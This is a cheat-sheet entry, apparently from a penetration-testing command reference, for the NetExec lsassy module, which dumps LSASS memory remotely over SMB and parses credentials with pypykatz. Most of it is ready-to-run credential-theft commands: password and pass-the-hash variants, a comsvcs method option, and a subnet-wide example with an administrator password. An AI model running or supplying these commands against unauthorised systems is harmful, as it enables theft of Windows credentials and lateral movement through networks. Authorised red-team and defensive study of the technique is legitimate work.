NetExec lsassy Module (Remote LSASS Dump)

Dump LSASS remotely via the lsassy module — uses procdump/comsvcs/dllinjection methods, parses on the fly with pypykatz, and never drops the dump file to disk on the attacker side. Requires local admin on the target.

Tool
nxc
Category
Credential Attacks / Hash Dumping
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb <target> -u '<user>' -p '<password>' -M lsassy

Credential variants

The same attack using a different authentication material.

Hash Auth requires NTLM hash

nxc smb <target> -u '<user>' -H '<hash>' -M lsassy

Specific Method requires password

nxc smb <target> -u '<user>' -p '<password>' -M lsassy -o METHOD=comsvcs

Examples

nxc smb 10.10.10.0/24 -u administrator -p 'Password123!' -M lsassy

Tags

netexec nxc lsassy lsass credentials pypykatz

References